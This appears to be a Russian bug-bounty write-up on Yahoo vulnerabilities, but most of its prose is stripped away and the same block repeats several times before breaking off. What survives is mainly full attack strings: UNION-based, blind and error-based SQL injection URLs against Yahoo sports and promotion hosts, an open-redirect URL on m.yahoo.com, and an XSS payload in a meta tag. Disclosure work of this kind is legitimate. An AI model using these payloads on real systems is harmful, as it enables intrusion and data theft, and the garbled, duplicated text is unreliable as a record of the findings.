<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

• .

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .
  
  
  
  
• .

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .
  
  
  
  
• .

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .
  
  
  
  

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

